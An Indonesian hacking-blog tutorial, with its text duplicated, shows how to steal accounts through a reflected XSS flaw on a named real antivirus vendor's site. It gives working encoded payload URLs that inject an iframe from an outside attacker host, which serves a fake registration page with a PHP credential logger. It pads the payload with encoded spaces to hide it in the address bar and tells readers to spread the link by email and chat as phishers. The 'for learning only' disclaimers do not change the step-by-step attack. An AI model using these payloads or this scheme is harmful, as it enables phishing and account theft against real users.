Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:
*Apa hebatnya sih, cuman nulis di URL doank
*Begituan mah gak ada gunanya
*XSS mah gak bisa dideface halamannya
*Itu kan cuman perubahan address doank
Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya "STEALING ACCOUNT IN VULNERABLE WEBSITE". (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)
Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability.
Skenarionya adalah:
1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
Tunggu & kita mendapatkannya deh.. :)
Langkah-langkahnya adalah :
PERTAMA
* Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
* Test XSS apakah bisa berjalan di website, berikut contohnya: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/
* Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
* Oke, sudah ketahuan websitenya vulnerable
KEDUA
* Dalam benak, banyak ide, antara login & register pages.
* Akhirnya kembali coding, membuat page halaman register di ESET
* Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:
* Fake register tadi yang saya buat saya simpan di http://restinpeace.biz/eset/ (CONTOH), permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hehehe.. :D
KETIGA
* Disini kita akan menggunakan html code "iframe"
* Sebelum kita melakukan aksi, maka code XSS:
* Copy code tersebut ke URL sehingga menjadi: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
* Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (? ?), sehingga URL iframe tidak tampak di address karena kepanjangan: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.
* Sudah selesai page untuk fake register, lanjut ke step selanjutnya.
KEEMPAT
* Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!)
KELIMA
* Kita tunggu hasilnya & kita cek log yang masuk
* Taaaadddddaaaaaa, ada beberapa yang masuk :D
Download Source Code :
Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri. Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.
Jadi untuk semua selamat belajar & semoga bermanfaat.
Silakan Follow Twitter Saya Untuk Bertegur Sapa:
Thanks.. Enjoy & Eat It! :)
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:
*Apa hebatnya sih, cuman nulis di URL doank
*Begituan mah gak ada gunanya
*XSS mah gak bisa dideface halamannya
*Itu kan cuman perubahan address doank
Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya "STEALING ACCOUNT IN VULNERABLE WEBSITE". (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)
Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability.
Skenarionya adalah:
1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
Tunggu & kita mendapatkannya deh.. :)
Langkah-langkahnya adalah :
PERTAMA
* Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
* Test XSS apakah bisa berjalan di website, berikut contohnya: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/
* Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
* Oke, sudah ketahuan websitenya vulnerable
KEDUA
* Dalam benak, banyak ide, antara login & register pages.
* Akhirnya kembali coding, membuat page halaman register di ESET
* Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:
* Fake register tadi yang saya buat saya simpan di http://restinpeace.biz/eset/ (CONTOH), permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hehehe.. :D
KETIGA
* Disini kita akan menggunakan html code "iframe"
* Sebelum kita melakukan aksi, maka code XSS:
Code:
di encode dulu menjadi:<iframe src=http://restinpeace.biz/eset/register.php width=1500>
Code:
%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
* Copy code tersebut ke URL sehingga menjadi: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E
* Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (? ?), sehingga URL iframe tidak tampak di address karena kepanjangan: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.
* Sudah selesai page untuk fake register, lanjut ke step selanjutnya.
KEEMPAT
* Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!)
KELIMA
* Kita tunggu hasilnya & kita cek log yang masuk
* Taaaadddddaaaaaa, ada beberapa yang masuk :D
Download Source Code :
Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri. Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.
Jadi untuk semua selamat belajar & semoga bermanfaat.
Silakan Follow Twitter Saya Untuk Bertegur Sapa:
Thanks.. Enjoy & Eat It! :)
See Also:
Tekhnik Membuka File Rar Yang Di Password
Hack WIFI #2 [ Versi Indonesia ]
Cara Mempercepat Akses Ke Salah Satu Web Pada Saat Browsing
Jawaban Hackertest.net Level 1-20
Hack Pesawat Telepon Yang Terkunci
Hack Email Accounts Using Google
Menembus Proteksi Password Dan Serial Number Pada Program Dengan Trik Win32 Hook
Hack WIFI #2 [ Versi Indonesia ]
Cara Mempercepat Akses Ke Salah Satu Web Pada Saat Browsing
Jawaban Hackertest.net Level 1-20
Hack Pesawat Telepon Yang Terkunci
Hack Email Accounts Using Google
Menembus Proteksi Password Dan Serial Number Pada Program Dengan Trik Win32 Hook
Tidak ada komentar:
Posting Komentar